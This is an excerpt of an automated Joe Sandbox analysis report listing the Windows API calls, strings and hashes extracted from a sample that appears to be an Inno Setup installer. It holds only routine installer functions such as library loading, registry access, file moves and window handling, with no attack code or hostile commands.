                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateErrorFileHandleLast
                                                                          • String ID: CreateFile
                                                                          • API String ID: 2528220319-823142352
                                                                          • Opcode ID: 45f398a1a593fdecff2147bb029019ab571d1f120eeae4798deb9ab921dd96fc
                                                                          • Instruction ID: 870c31508693feaa39a4cce9bbdb9491accbaf3cbacbc975652ec4f9337bcdac
                                                                          • Opcode Fuzzy Hash: 45f398a1a593fdecff2147bb029019ab571d1f120eeae4798deb9ab921dd96fc
                                                                          • Instruction Fuzzy Hash: 88E06D302403447FEA10EA69CCC6F497798AB04728F10C152FA48AF3E2C5B9FC80866C
                                                                          APIs
                                                                            • Part of subcall function 00456E64: CoInitialize.OLE32(00000000), ref: 00456E6A
                                                                            • Part of subcall function 0042E38C: SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                                            • Part of subcall function 0042E38C: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                                          • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456EF8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                          • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                          • API String ID: 2906209438-2320870614
                                                                          • Opcode ID: 08d23a7e6096c5616a14a2d2cd89d11c62b3b5d1f72113431a163231d9b2ac33
                                                                          • Instruction ID: 195fe0e36b32ee525331c9a8c220a45252f3edc4141651a384f0b9e1c2da6bc9
                                                                          • Opcode Fuzzy Hash: 08d23a7e6096c5616a14a2d2cd89d11c62b3b5d1f72113431a163231d9b2ac33
                                                                          • Instruction Fuzzy Hash: 45C00291B4265092CA40B7FA695261E28049B8031AB92813BB951A7587CA6C88099A6E
                                                                          APIs
                                                                            • Part of subcall function 0042E38C: SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                                            • Part of subcall function 0042E38C: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                                          • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CC25
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorLibraryLoadModeProc
                                                                          • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                          • API String ID: 2492108670-2683653824
                                                                          • Opcode ID: 55b93e5fb714966f70f5ffd37ba9539aaa645b322ed6e907ef1699bb6481b051
                                                                          • Instruction ID: f133f44782887ed2db26bd8e5f2adaf6b1782a38bec069888892578a86e918ee
                                                                          • Opcode Fuzzy Hash: 55b93e5fb714966f70f5ffd37ba9539aaa645b322ed6e907ef1699bb6481b051
                                                                          • Instruction Fuzzy Hash: 85B092A060274086CB00B7A2699262B28059740309B90803BB0889B286EA3C88121BEF
                                                                          APIs
                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448701), ref: 00448644
                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486C5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID:
                                                                          • API String ID: 2574300362-0
                                                                          • Opcode ID: 38a0c8dcb6cfe2486321be47105cd2edcf630b03ef44025de89f80e5062423d0
                                                                          • Instruction ID: 4a5ebe3fee4a2e51bf72c529b0c862ae9b4ea9e2815ff95c09d8a3db799a058c
                                                                          • Opcode Fuzzy Hash: 38a0c8dcb6cfe2486321be47105cd2edcf630b03ef44025de89f80e5062423d0
                                                                          • Instruction Fuzzy Hash: 4A515470E00105AFDB40EFA5C481AAEBBF9EB45315F11817FE814BB391DA789E05CB99
                                                                          APIs
                                                                          • GetSystemMenu.USER32(00000000,00000000,00000000,00481378), ref: 00481310
                                                                          • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00481321
                                                                          • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00481339
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Append$System
                                                                          • String ID:
                                                                          • API String ID: 1489644407-0
                                                                          • Opcode ID: 63b26f928f1c87accb3103f044f3acf90972e1faa844404f13018ca58e8bddc3
                                                                          • Instruction ID: 5c8896f7e766c0ec1e9fe117ebe49108a2e73e6ee011f2acc73c141eda266b91
                                                                          • Opcode Fuzzy Hash: 63b26f928f1c87accb3103f044f3acf90972e1faa844404f13018ca58e8bddc3
                                                                          • Instruction Fuzzy Hash: F431A0307043441AE711FB759C82BAE3B989B55318F54997BBC00A62E3CA7C9C4A87AD
                                                                          APIs
                                                                          • 74D41520.VERSION(00000000,?,?,?,00496E0C), ref: 00452504
                                                                          • 74D41500.VERSION(00000000,?,00000000,?,00000000,0045257F,?,00000000,?,?,?,00496E0C), ref: 00452531
                                                                          • 74D41540.VERSION(?,004525A8,?,?,00000000,?,00000000,?,00000000,0045257F,?,00000000,?,?,?,00496E0C), ref: 0045254B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: D41500D41520D41540
                                                                          • String ID:
                                                                          • API String ID: 2153611984-0
                                                                          • Opcode ID: c4d10431c24d3ec04fd95a2756a86a033cda299e0aeed98268810ee563e95d09
                                                                          • Instruction ID: e6b34cf6ad4872bd94a826b675f3d2b909ad99421c044533a40ff62eec17d383
                                                                          • Opcode Fuzzy Hash: c4d10431c24d3ec04fd95a2756a86a033cda299e0aeed98268810ee563e95d09
                                                                          • Instruction Fuzzy Hash: C2219531A00608BFDB01DAA98D519AFB7FCEB4A341F554477FC04E3242E6B9AE04C769
                                                                          APIs
                                                                          • 73A1A570.USER32(00000000,?,00000000,00000000,0044B485,?,00481BA7,?,?), ref: 0044B3F9
                                                                          • SelectObject.GDI32(?,00000000), ref: 0044B41C
                                                                          • 73A1A480.USER32(00000000,?,0044B45C,00000000,0044B455,?,00000000,?,00000000,00000000,0044B485,?,00481BA7,?,?), ref: 0044B44F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: A480A570ObjectSelect
                                                                          • String ID:
                                                                          • API String ID: 1230475511-0
                                                                          • Opcode ID: c86bc8a9f0cb4198ec92499236d982b336435bb3408aeec5184fda352670fa70
                                                                          • Instruction ID: d0000cdbf443d5d41ac7fc8b7796d2cef13fade9d4e1083fbf8e955bfb0ad8b0
                                                                          • Opcode Fuzzy Hash: c86bc8a9f0cb4198ec92499236d982b336435bb3408aeec5184fda352670fa70
                                                                          • Instruction Fuzzy Hash: 94217770A04348AFEB11DFA6C851B9FBBB8DB49304F5184BAF904A6682D778D940CB59
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B144,?,00481BA7,?,?), ref: 0044B116
                                                                          • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B129
                                                                          • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B15D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: DrawText$ByteCharMultiWide
                                                                          • String ID:
                                                                          • API String ID: 65125430-0
                                                                          • Opcode ID: a3bbdd0e85052032b4464c044c199c381ab15dbe2007c11af0ea937095cc15c9
                                                                          • Instruction ID: 20993999b02ad9b2d132c7482a3993701c750e35562fff3cb1b1e5e45c97fd42
                                                                          • Opcode Fuzzy Hash: a3bbdd0e85052032b4464c044c199c381ab15dbe2007c11af0ea937095cc15c9
                                                                          • Instruction Fuzzy Hash: 9211B9B17046047FEB00DA6A9C82D6F77EDEB49754F10417AF504D7290D6399E0186A9
                                                                          APIs
                                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0042440A
                                                                          • TranslateMessage.USER32(?), ref: 00424487
                                                                          • DispatchMessageA.USER32(?), ref: 00424491
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Message$DispatchPeekTranslate
                                                                          • String ID:
                                                                          • API String ID: 4217535847-0
                                                                          • Opcode ID: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                          • Instruction ID: b41559e7cef9b8617ee35765752275fac57a970be1b78d71f4432c2d4d9c435b
                                                                          • Opcode Fuzzy Hash: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                          • Instruction Fuzzy Hash: E911943030471096EA20F6A4E94179B73D4DFC1748F80485EF98997382D7BD9E45979F
                                                                          APIs
                                                                          • SetPropA.USER32(00000000,00000000), ref: 00416662
                                                                          • SetPropA.USER32(00000000,00000000), ref: 00416677
                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 0041669E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Prop$Window
                                                                          • String ID:
                                                                          • API String ID: 3363284559-0
                                                                          • Opcode ID: c28d9c26afe72c5be1bf0cacc918de6e274a174950c4a3475c45b681fa8918c3
                                                                          • Instruction ID: 2f709078d098ddf512341954ec1abde5ac178872df7165362e48a9b460053d77
                                                                          • Opcode Fuzzy Hash: c28d9c26afe72c5be1bf0cacc918de6e274a174950c4a3475c45b681fa8918c3
                                                                          • Instruction Fuzzy Hash: 11F0B271701210ABDB10AB599C85FA732DCAB09715F16017AB945EF286C6B8DD5087A8
                                                                          APIs
                                                                          • IsWindowVisible.USER32(?), ref: 0041EE5C
                                                                          • IsWindowEnabled.USER32(?), ref: 0041EE66
                                                                          • EnableWindow.USER32(?,00000000), ref: 0041EE8C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window$EnableEnabledVisible
                                                                          • String ID:
                                                                          • API String ID: 3234591441-0
                                                                          APIs
                                                                          • SetActiveWindow.USER32(?), ref: 00469E55
                                                                          Similarity
                                                                          • API ID: ActiveWindow
                                                                          • String ID: PrepareToInstall
                                                                          • API String ID: 2558294473-1101760603
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: /:*?"<>|
                                                                          • API String ID: 0-4078764451
                                                                          APIs
                                                                          • SetActiveWindow.USER32(?), ref: 00481C3A
                                                                          Similarity
                                                                          • API ID: ActiveWindow
                                                                          • String ID: InitializeWizard
                                                                          • API String ID: 2558294473-2356795471
                                                                          APIs
                                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047BFEA,00000000,0047C124), ref: 0047BDE9
                                                                          Strings
                                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047BDB9
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                          • API String ID: 47109696-1019749484
                                                                          APIs
                                                                          • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F352,?,?,00000000,0046F516,?,_is1,?), ref: 0046ECE7
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: NoModify
                                                                          • API String ID: 3702945584-1699962838
                                                                          APIs
                                                                          • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                          Strings
                                                                          • System\CurrentControlSet\Control\Windows, xrefs: 0042DE2E
                                                                          Similarity
                                                                          • API ID: Open
                                                                          • String ID: System\CurrentControlSet\Control\Windows
                                                                          • API String ID: 71445658-1109719901
                                                                          APIs
                                                                          • GetACP.KERNEL32(?,?,00000001,00000000,0047DD9B,?,-0000001A,0047FC14,-00000010,?,00000004,0000001B,00000000,0047FF61,?,0045D988), ref: 0047DB32
                                                                            • Part of subcall function 0042E314: 73A1A570.USER32(00000000,00000000,0047FFC8,?,?,00000001,00000000,00000002,00000000,004808CA,?,?,?,?,?,004981E7), ref: 0042E323
                                                                            • Part of subcall function 0042E314: EnumFontsA.GDI32(?,00000000,0042E300,00000000,00000000,0042E36C,?,00000000,00000000,0047FFC8,?,?,00000001,00000000,00000002,00000000), ref: 0042E34E
                                                                            • Part of subcall function 0042E314: 73A1A480.USER32(00000000,?,0042E373,00000000,00000000,0042E36C,?,00000000,00000000,0047FFC8,?,?,00000001,00000000,00000002,00000000), ref: 0042E366
                                                                          • SendNotifyMessageA.USER32(0001043E,00000496,00002711,-00000001), ref: 0047DD02
                                                                          Similarity
                                                                          • API ID: A480A570EnumFontsMessageNotifySend
                                                                          • String ID:
                                                                          • API String ID: 2685184028-0
                                                                          APIs
                                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFCE,?,?,00000008,00000000,00000000,0042DFFB), ref: 0042DF64
                                                                          • RegCloseKey.ADVAPI32(?,0042DFD5,?,00000000,00000000,00000000,00000000,00000000,0042DFCE,?,?,00000008,00000000,00000000,0042DFFB), ref: 0042DFC8
                                                                          Similarity
                                                                          • API ID: CloseEnum
                                                                          • String ID:
                                                                          • API String ID: 2818636725-0
                                                                          APIs
                                                                            • Part of subcall function 00494A14: 73A1A570.USER32(00000000,?,?,00000000), ref: 00494A25
                                                                            • Part of subcall function 00494A14: SelectObject.GDI32(00000000,00000000), ref: 00494A47
                                                                            • Part of subcall function 00494A14: GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00494FC5), ref: 00494A5B
                                                                            • Part of subcall function 00494A14: GetTextMetricsA.GDI32(00000000,?), ref: 00494A7D
                                                                            • Part of subcall function 00494A14: 73A1A480.USER32(00000000,00000000,00494AA7,00494AA0,?,00000000,?,?,00000000), ref: 00494A9A
                                                                          • MulDiv.KERNEL32(?,?,00000006), ref: 00495007
                                                                          • MulDiv.KERNEL32(?,?,0000000D), ref: 0049501C
                                                                          Similarity
                                                                          • API ID: Text$A480A570ExtentMetricsObjectPointSelect
                                                                          • String ID:
                                                                          • API String ID: 2611416588-0
                                                                          APIs
                                                                          • CreateProcessA.KERNEL32(00000000,00000000,?,?,00458098,00000000,00458080,?,?,?,00000000,00452836,?,?,?,00000001), ref: 00452810
                                                                          • GetLastError.KERNEL32(00000000,00000000,?,?,00458098,00000000,00458080,?,?,?,00000000,00452836,?,?,?,00000001), ref: 00452818
                                                                          Similarity
                                                                          • API ID: CreateErrorLastProcess
                                                                          • String ID:
                                                                          • API String ID: 2919029540-0
                                                                          APIs
                                                                          • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AFDA
                                                                          • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B137,00000000,0040B14F,?,?,?,00000000), ref: 0040AFEB
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$FindFree
                                                                          • String ID:
                                                                          • API String ID: 4097029671-0
                                                                          • Opcode ID: bd4d08f36a9d4a560adef0fa1bde098128f2b715f965cb3459cef9598ac6c158
                                                                          • Instruction ID: aeeba5ce467f8effdb78304bcd792b874f75604bed8582862ca5d9c37e282381
                                                                          • Opcode Fuzzy Hash: bd4d08f36a9d4a560adef0fa1bde098128f2b715f965cb3459cef9598ac6c158
                                                                          • Instruction Fuzzy Hash: CE01DF71700700AFDB14EF65AC92A1B77ADDB4A714B11807AF400AB3D1DA39AC019AA9
                                                                          APIs
                                                                          • GetCurrentThreadId.KERNEL32 ref: 0041EEEB
                                                                          • 73A25940.USER32(00000000,0041EE4C,00000000,00000000,0041EF08,?,00000000,0041EF3F,?,0042EEA8,?,00000001), ref: 0041EEF1
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: A25940CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2655091166-0
                                                                          • Opcode ID: b000ad2c2d45302efb537f6ed51b85bb3a5cc49cf8a353236d3522148df1097f
                                                                          • Instruction ID: ec06e6b8def62778297c6a117e91140491810bf1675edd7fb5fc45fb14f34894
                                                                          • Opcode Fuzzy Hash: b000ad2c2d45302efb537f6ed51b85bb3a5cc49cf8a353236d3522148df1097f
                                                                          • Instruction Fuzzy Hash: D9015B76A04604BFD706CF6BDC1199ABBE8E789720B22887BEC04D3690E6355810DF18
                                                                          APIs
                                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 00452C96
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00452CBC), ref: 00452C9E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastMove
                                                                          • String ID:
                                                                          • API String ID: 55378915-0
                                                                          • Opcode ID: 4b3f53bb71bbb3de239a758d95ad3dd7b2750d400091be83cb52db7a615a65e0
                                                                          • Instruction ID: 72322736c602c8c7a1920fbe291f5aeb87443d44c1116871956ce6e3077d7411
                                                                          • Opcode Fuzzy Hash: 4b3f53bb71bbb3de239a758d95ad3dd7b2750d400091be83cb52db7a615a65e0
                                                                          • Instruction Fuzzy Hash: C9012671B00604AB8B01EB799D4189EB7ECDB4A32575045BBFC14E3343EA784E04456C
                                                                          APIs
                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527A3), ref: 0045277D
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,004527A3), ref: 00452785
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1375471231-0
                                                                          • Opcode ID: 9ee879c615aac4fee22e4c99406f95e71c245cbd6d77cc6155be40721354894d
                                                                          • Instruction ID: e798b8fcaf2c893210dd6dd972d3083c0fc79cae1e6532b7171fe4e83a13409b
                                                                          • Opcode Fuzzy Hash: 9ee879c615aac4fee22e4c99406f95e71c245cbd6d77cc6155be40721354894d
                                                                          • Instruction Fuzzy Hash: E1F02871A04604BFCB00EF759E4159EB3E8DB0E721B1045B7FC04E3242E7B94E048598
                                                                          APIs
                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 00423241
                                                                          • LoadCursorA.USER32(00000000,00000000), ref: 0042326B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
